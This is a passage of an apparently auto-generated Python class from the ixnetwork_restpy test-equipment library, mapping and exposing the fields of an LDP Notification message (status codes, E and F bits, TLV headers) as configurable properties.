'UnknownFECEBit': 'ldpNotification.header.statusTLV.statusCode.unknownFEC.eBit-49',
'UnknownFECFBit': 'ldpNotification.header.statusTLV.statusCode.unknownFEC.fBit-50',
'UnknownFECStatusData': 'ldpNotification.header.statusTLV.statusCode.unknownFEC.statusData-51',
'NoRouteEBit': 'ldpNotification.header.statusTLV.statusCode.noRoute.eBit-52',
'NoRouteFBit': 'ldpNotification.header.statusTLV.statusCode.noRoute.fBit-53',
'NoRouteStatusData': 'ldpNotification.header.statusTLV.statusCode.noRoute.statusData-54',
'NoLabelResourcesEBit': 'ldpNotification.header.statusTLV.statusCode.noLabelResources.eBit-55',
'NoLabelResourcesFBit': 'ldpNotification.header.statusTLV.statusCode.noLabelResources.fBit-56',
'NoLabelResourcesStatusData': 'ldpNotification.header.statusTLV.statusCode.noLabelResources.statusData-57',
'LabelResourcesAvailableEBit': 'ldpNotification.header.statusTLV.statusCode.labelResourcesAvailable.eBit-58',
'LabelResourcesAvailableFBit': 'ldpNotification.header.statusTLV.statusCode.labelResourcesAvailable.fBit-59',
'LabelResourcesAvailableStatusData': 'ldpNotification.header.statusTLV.statusCode.labelResourcesAvailable.statusData-60',
'SessionRejectedNoHelloEBit': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedNoHello.eBit-61',
'SessionRejectedNoHelloFBit': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedNoHello.fBit-62',
'SessionRejectedNoHelloStatusData': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedNoHello.statusData-63',
'SessionRejectedAdvertisementModeEBit': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedAdvertisementMode.eBit-64',
'SessionRejectedAdvertisementModeFBit': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedAdvertisementMode.fBit-65',
'SessionRejectedAdvertisementModeStatusData': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedAdvertisementMode.statusData-66',
'SessionRejectedMaxPDULengthEBit': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedMaxPDULength.eBit-67',
'SessionRejectedMaxPDULengthFBit': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedMaxPDULength.fBit-68',
'SessionRejectedMaxPDULengthStatusData': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedMaxPDULength.statusData-69',
'SessionRejectedLabelRangeEBit': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedLabelRange.eBit-70',
'SessionRejectedLabelRangeFBit': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedLabelRange.fBit-71',
'SessionRejectedLabelRangeStatusData': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedLabelRange.statusData-72',
'KeepaliveTimerExiredEBit': 'ldpNotification.header.statusTLV.statusCode.keepaliveTimerExired.eBit-73',
'KeepaliveTimerExiredFBit': 'ldpNotification.header.statusTLV.statusCode.keepaliveTimerExired.fBit-74',
'KeepaliveTimerExiredStatusData': 'ldpNotification.header.statusTLV.statusCode.keepaliveTimerExired.statusData-75',
'LabelRequestAbortedEBit': 'ldpNotification.header.statusTLV.statusCode.labelRequestAborted.eBit-76',
'LabelRequestAbortedFBit': 'ldpNotification.header.statusTLV.statusCode.labelRequestAborted.fBit-77',
'LabelRequestAbortedStatusData': 'ldpNotification.header.statusTLV.statusCode.labelRequestAborted.statusData-78',
'MissingMessageParametersEBit': 'ldpNotification.header.statusTLV.statusCode.missingMessageParameters.eBit-79',
'MissingMessageParametersFBit': 'ldpNotification.header.statusTLV.statusCode.missingMessageParameters.fBit-80',
'MissingMessageParametersStatusData': 'ldpNotification.header.statusTLV.statusCode.missingMessageParameters.statusData-81',
'UnsupportedAddressFamilyEBit': 'ldpNotification.header.statusTLV.statusCode.unsupportedAddressFamily.eBit-82',
'UnsupportedAddressFamilyFBit': 'ldpNotification.header.statusTLV.statusCode.unsupportedAddressFamily.fBit-83',
'UnsupportedAddressFamilyStatusData': 'ldpNotification.header.statusTLV.statusCode.unsupportedAddressFamily.statusData-84',
'SessionRejectedBadKeepaliveTimeEBit': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedBadKeepaliveTime.eBit-85',
'SessionRejectedBadKeepaliveTimeFBit': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedBadKeepaliveTime.fBit-86',
'SessionRejectedBadKeepaliveTimeStatusData': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedBadKeepaliveTime.statusData-87',
'InternalErrorEBit': 'ldpNotification.header.statusTLV.statusCode.internalError.eBit-88',
'InternalErrorFBit': 'ldpNotification.header.statusTLV.statusCode.internalError.fBit-89',
'InternalErrorStatusData': 'ldpNotification.header.statusTLV.statusCode.internalError.statusData-90',
'StatusTLVMessageID': 'ldpNotification.header.statusTLV.messageID-91',
'StatusTLVMessageType': 'ldpNotification.header.statusTLV.messageType-92',
'TclLDPMpStatusTLVUBit': 'ldpNotification.header.tclLDPMpStatusTLV.uBit-93',
'TclLDPMpStatusTLVFBit': 'ldpNotification.header.tclLDPMpStatusTLV.fBit-94',
'TclLDPMpStatusTLVTclType': 'ldpNotification.header.tclLDPMpStatusTLV.tclType-95',
'TclLDPMpStatusTLVTclLength': 'ldpNotification.header.tclLDPMpStatusTLV.tclLength-96',
'TclCustomTypeTclType': 'ldpNotification.header.tclLDPMpStatusTLV.tclLDPMPStatusValueElements.selectTLVType.tclCustomType.tclType-97',
'TclCustomTypeTclLength': 'ldpNotification.header.tclLDPMpStatusTLV.tclLDPMPStatusValueElements.selectTLVType.tclCustomType.tclLength-98',
'TclCustomTypeTclValue': 'ldpNotification.header.tclLDPMpStatusTLV.tclLDPMPStatusValueElements.selectTLVType.tclCustomType.tclValue-99',
'FecTLVUBit': 'ldpNotification.header.fecTLV.uBit-100',
'FecTLVFBit': 'ldpNotification.header.fecTLV.fBit-101',
'FecTLVType': 'ldpNotification.header.fecTLV.type-102',
'FecTLVLength': 'ldpNotification.header.fecTLV.length-103',
'TclP2mpTclType': 'ldpNotification.header.fecTLV.fecElement.tclP2mp.tclType-104',
'TclIpv4P2mpAddressTclP2mpAddressFamily': 'ldpNotification.header.fecTLV.fecElement.tclP2mp.tclAddressFamily.tclIpv4P2mpAddress.tclP2mpAddressFamily-105',
'TclIpv4P2mpAddressTclP2mpAddressLength': 'ldpNotification.header.fecTLV.fecElement.tclP2mp.tclAddressFamily.tclIpv4P2mpAddress.tclP2mpAddressLength-106',
'TclIpv4P2mpAddressTclRootAddress': 'ldpNotification.header.fecTLV.fecElement.tclP2mp.tclAddressFamily.tclIpv4P2mpAddress.tclRootAddress-107',
'TclIpv6P2mpAddressTclP2mpIpv6AddressFamily': 'ldpNotification.header.fecTLV.fecElement.tclP2mp.tclAddressFamily.tclIpv6P2mpAddress.tclP2mpIpv6AddressFamily-108',
'TclIpv6P2mpAddressTclP2mpIpv6AddressLength': 'ldpNotification.header.fecTLV.fecElement.tclP2mp.tclAddressFamily.tclIpv6P2mpAddress.tclP2mpIpv6AddressLength-109',
'TclIpv6P2mpAddressTclIpv6RootAddress': 'ldpNotification.header.fecTLV.fecElement.tclP2mp.tclAddressFamily.tclIpv6P2mpAddress.tclIpv6RootAddress-110',
'TclP2mpTclOpaqueLength': 'ldpNotification.header.fecTLV.fecElement.tclP2mp.tclOpaqueLength-111',
'TclGenericLSPIdentifierTLVTclType': 'ldpNotification.header.fecTLV.fecElement.tclP2mp.tclOpaqueTlvs.selectTLVType.tclGenericLSPIdentifierTLV.tclType-112',
'TclGenericLSPIdentifierTLVTclLength': 'ldpNotification.header.fecTLV.fecElement.tclP2mp.tclOpaqueTlvs.selectTLVType.tclGenericLSPIdentifierTLV.tclLength-113',
'TclGenericLSPIdentifierTLVTclValue': 'ldpNotification.header.fecTLV.fecElement.tclP2mp.tclOpaqueTlvs.selectTLVType.tclGenericLSPIdentifierTLV.tclValue-114',
'TclEditTLVTclType': 'ldpNotification.header.fecTLV.fecElement.tclP2mp.tclOpaqueTlvs.selectTLVType.tclEditTLV.tclType-115',
'TclEditTLVTclLength': 'ldpNotification.header.fecTLV.fecElement.tclP2mp.tclOpaqueTlvs.selectTLVType.tclEditTLV.tclLength-116',
'TclEditTLVTclValue': 'ldpNotification.header.fecTLV.fecElement.tclP2mp.tclOpaqueTlvs.selectTLVType.tclEditTLV.tclValue-117',
'TclP2mpTypedWcardTclTypeTypedWcard': 'ldpNotification.header.fecTLV.fecElement.tclP2mpTypedWcard.tclTypeTypedWcard-118',
'TclP2mpTypedWcardTclTypeWcard': 'ldpNotification.header.fecTLV.fecElement.tclP2mpTypedWcard.tclTypeWcard-119',
'TclP2mpTypedWcardTclTypeLen': 'ldpNotification.header.fecTLV.fecElement.tclP2mpTypedWcard.tclTypeLen-120',
'TclP2mpTypedWcardTclTypeAfi': 'ldpNotification.header.fecTLV.fecElement.tclP2mpTypedWcard.tclTypeAfi-121',
'GenericLabelTLVUBit': 'ldpNotification.header.labelTLV.genericLabelTLV.uBit-122',
'GenericLabelTLVFBit': 'ldpNotification.header.labelTLV.genericLabelTLV.fBit-123',
'GenericLabelTLVType': 'ldpNotification.header.labelTLV.genericLabelTLV.type-124',
'GenericLabelTLVLength': 'ldpNotification.header.labelTLV.genericLabelTLV.length-125',
'GenericLabelTLVLabel': 'ldpNotification.header.labelTLV.genericLabelTLV.label-126',
'AtmLabelTLVUBit': 'ldpNotification.header.labelTLV.atmLabelTLV.uBit-127',
'AtmLabelTLVFBit': 'ldpNotification.header.labelTLV.atmLabelTLV.fBit-128',
'AtmLabelTLVType': 'ldpNotification.header.labelTLV.atmLabelTLV.type-129',
'AtmLabelTLVLength': 'ldpNotification.header.labelTLV.atmLabelTLV.length-130',
'AtmLabelTLVReserved': 'ldpNotification.header.labelTLV.atmLabelTLV.reserved-131',
'AtmLabelTLVVBits': 'ldpNotification.header.labelTLV.atmLabelTLV.vBits-132',
'AtmLabelTLVVpi': 'ldpNotification.header.labelTLV.atmLabelTLV.vpi-133',
'AtmLabelTLVVci': 'ldpNotification.header.labelTLV.atmLabelTLV.vci-134',
'FrameRelayLabelTLVUBit': 'ldpNotification.header.labelTLV.frameRelayLabelTLV.uBit-135',
'FrameRelayLabelTLVFBit': 'ldpNotification.header.labelTLV.frameRelayLabelTLV.fBit-136',
'FrameRelayLabelTLVType': 'ldpNotification.header.labelTLV.frameRelayLabelTLV.type-137',
'FrameRelayLabelTLVLength': 'ldpNotification.header.labelTLV.frameRelayLabelTLV.length-138',
'FrameRelayLabelTLVReserved': 'ldpNotification.header.labelTLV.frameRelayLabelTLV.reserved-139',
'FrameRelayLabelTLVDlciLength': 'ldpNotification.header.labelTLV.frameRelayLabelTLV.dlciLength-140',
'FrameRelayLabelTLVDlci': 'ldpNotification.header.labelTLV.frameRelayLabelTLV.dlci-141',
'ExtendedStatusTLVUBit': 'ldpNotification.header.optionalParameter.extendedStatusTLV.uBit-142',
'ExtendedStatusTLVFBit': 'ldpNotification.header.optionalParameter.extendedStatusTLV.fBit-143',
'ExtendedStatusTLVType': 'ldpNotification.header.optionalParameter.extendedStatusTLV.type-144',
'ExtendedStatusTLVLength': 'ldpNotification.header.optionalParameter.extendedStatusTLV.length-145',
'ExtendedStatusTLVCode': 'ldpNotification.header.optionalParameter.extendedStatusTLV.code-146',
'ReturnedPDUTLVUBit': 'ldpNotification.header.optionalParameter.returnedPDUTLV.uBit-147',
'ReturnedPDUTLVFBit': 'ldpNotification.header.optionalParameter.returnedPDUTLV.fBit-148',
'ReturnedPDUTLVType': 'ldpNotification.header.optionalParameter.returnedPDUTLV.type-149',
'ReturnedPDUTLVLength': 'ldpNotification.header.optionalParameter.returnedPDUTLV.length-150',
'ReturnedMessageTLVUBit': 'ldpNotification.header.optionalParameter.returnedMessageTLV.uBit-151',
'ReturnedMessageTLVFBit': 'ldpNotification.header.optionalParameter.returnedMessageTLV.fBit-152',
'ReturnedMessageTLVType': 'ldpNotification.header.optionalParameter.returnedMessageTLV.type-153',
'ReturnedMessageTLVLength': 'ldpNotification.header.optionalParameter.returnedMessageTLV.length-154',
'ExtendedStatusTLVUBit': 'ldpNotification.header.optionalParameter.extendedStatusTLV.uBit-155',
'ExtendedStatusTLVFBit': 'ldpNotification.header.optionalParameter.extendedStatusTLV.fBit-156',
'ExtendedStatusTLVType': 'ldpNotification.header.optionalParameter.extendedStatusTLV.type-157',
'ExtendedStatusTLVLength': 'ldpNotification.header.optionalParameter.extendedStatusTLV.length-158',
'ExtendedStatusTLVCode': 'ldpNotification.header.optionalParameter.extendedStatusTLV.code-159',
}
def __init__(self, parent, list_op=False):
super(LdpNotification, self).__init__(parent, list_op)
@property
def HeaderVersion(self):
"""
Display Name: Version
Default Value: 1
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderVersion']))
@property
def HeaderPduLengthinOctets(self):
"""
Display Name: PDU length(in octets)
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderPduLengthinOctets']))
@property
def HeaderLsrID(self):
"""
Display Name: LSR ID
Default Value: 0.0.0.0
Value Format: iPv4
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderLsrID']))
@property
def HeaderLabelSpace(self):
"""
Display Name: Label space
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderLabelSpace']))
@property
def HeaderUBit(self):
"""
Display Name: U bit
Default Value: 0
Value Format: decimal
Available enum values: Ignore entire message if unknown TLV, 0, Ignore only unknown TLV, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderUBit']))
@property
def HeaderType(self):
"""
Display Name: Type
Default Value: 0x0001
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderType']))
@property
def HeaderLength(self):
"""
Display Name: Length
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderLength']))
@property
def HeaderMessageID(self):
"""
Display Name: Message ID
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderMessageID']))
@property
def StatusTLVUBit(self):
"""
Display Name: U bit
Default Value: 0
Value Format: decimal
Available enum values: Ignore entire message if unknown TLV, 0, Ignore only unknown TLV, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['StatusTLVUBit']))
@property
def StatusTLVFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['StatusTLVFBit']))
@property
def StatusTLVType(self):
"""
Display Name: Type
Default Value: 0x0300
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['StatusTLVType']))
@property
def StatusTLVLength(self):
"""
Display Name: Length
Default Value: 10
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['StatusTLVLength']))
@property
def SuccessEBit(self):
"""
Display Name: E bit
Default Value: 0
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SuccessEBit']))
@property
def SuccessFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SuccessFBit']))
@property
def SuccessStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000000
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SuccessStatusData']))
@property
def BadLDPIdentifierEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadLDPIdentifierEBit']))
@property
def BadLDPIdentifierFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadLDPIdentifierFBit']))
@property
def BadLDPIdentifierStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000001
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadLDPIdentifierStatusData']))
@property
def BadProtocolVersionEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadProtocolVersionEBit']))
@property
def BadProtocolVersionFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadProtocolVersionFBit']))
@property
def BadProtocolVersionStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000002
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadProtocolVersionStatusData']))
@property
def BadPDULengthEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadPDULengthEBit']))
@property
def BadPDULengthFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadPDULengthFBit']))
@property
def BadPDULengthStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000003
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadPDULengthStatusData']))
@property
def UnknownMessageTypeEBit(self):
"""
Display Name: E bit
Default Value: 0
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnknownMessageTypeEBit']))
@property
def UnknownMessageTypeFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnknownMessageTypeFBit']))
@property
def UnknownMessageTypeStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000004
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnknownMessageTypeStatusData']))
@property
def BadMessageLengthEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadMessageLengthEBit']))
@property
def BadMessageLengthFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadMessageLengthFBit']))
@property
def BadMessageLengthStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000005
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadMessageLengthStatusData']))
@property
def UnknownTLVEBit(self):
"""
Display Name: E bit
Default Value: 0
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnknownTLVEBit']))
@property
def UnknownTLVFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnknownTLVFBit']))
@property
def UnknownTLVStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000006
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnknownTLVStatusData']))
@property
def BadTLVLengthEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadTLVLengthEBit']))
@property
def BadTLVLengthFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadTLVLengthFBit']))
@property
def BadTLVLengthStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000007
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadTLVLengthStatusData']))
@property
def MalformedTLVValueEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['MalformedTLVValueEBit']))
@property
def MalformedTLVValueFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['MalformedTLVValueFBit']))
@property
def MalformedTLVValueStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000008
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['MalformedTLVValueStatusData']))
@property
def HoldTimerExpiredEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HoldTimerExpiredEBit']))
@property
def HoldTimerExpiredFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HoldTimerExpiredFBit']))
@property
def HoldTimerExpiredStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000009
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HoldTimerExpiredStatusData']))
@property
def ShutdownEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ShutdownEBit']))
@property
def ShutdownFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ShutdownFBit']))
@property
def ShutdownStatusData(self):
"""
Display Name: Status data
Default Value: 0x000000A
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ShutdownStatusData']))
@property
def LoopDetectedEBit(self):
"""
Display Name: E bit
Default Value: 0
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['LoopDetectedEBit']))
@property
def LoopDetectedFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['LoopDetectedFBit']))
@property
def LoopDetectedStatusData(self):
"""
Display Name: Status data
Default Value: 0x000000B
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['LoopDetectedStatusData']))
@property
def UnknownFECEBit(self):
"""
Display Name: E bit
Default Value: 0
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnknownFECEBit']))
@property
def UnknownFECFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnknownFECFBit']))
@property
def UnknownFECStatusData(self):
"""
Display Name: Status data
Default Value: 0x000000C
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnknownFECStatusData']))
@property
def NoRouteEBit(self):
"""
Display Name: E bit
Default Value: 0
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['NoRouteEBit']))
@property
def NoRouteFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['NoRouteFBit']))
@property
def NoRouteStatusData(self):
"""
Display Name: Status data
Default Value: 0x000000D
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['NoRouteStatusData']))
@property
def NoLabelResourcesEBit(self):
"""
Display Name: E bit
Default Value: 0
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['NoLabelResourcesEBit']))
@property
def NoLabelResourcesFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['NoLabelResourcesFBit']))
@property
def NoLabelResourcesStatusData(self):
"""
Display Name: Status data
Default Value: 0x000000E
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['NoLabelResourcesStatusData']))
@property
def LabelResourcesAvailableEBit(self):
"""
Display Name: E bit
Default Value: 0
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['LabelResourcesAvailableEBit']))
@property
def LabelResourcesAvailableFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['LabelResourcesAvailableFBit']))
@property
def LabelResourcesAvailableStatusData(self):
"""
Display Name: Status data
Default Value: 0x000000F
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['LabelResourcesAvailableStatusData']))
@property
def SessionRejectedNoHelloEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedNoHelloEBit']))
@property
def SessionRejectedNoHelloFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedNoHelloFBit']))
@property
def SessionRejectedNoHelloStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000010
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedNoHelloStatusData']))
@property
def SessionRejectedAdvertisementModeEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedAdvertisementModeEBit']))
@property
def SessionRejectedAdvertisementModeFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
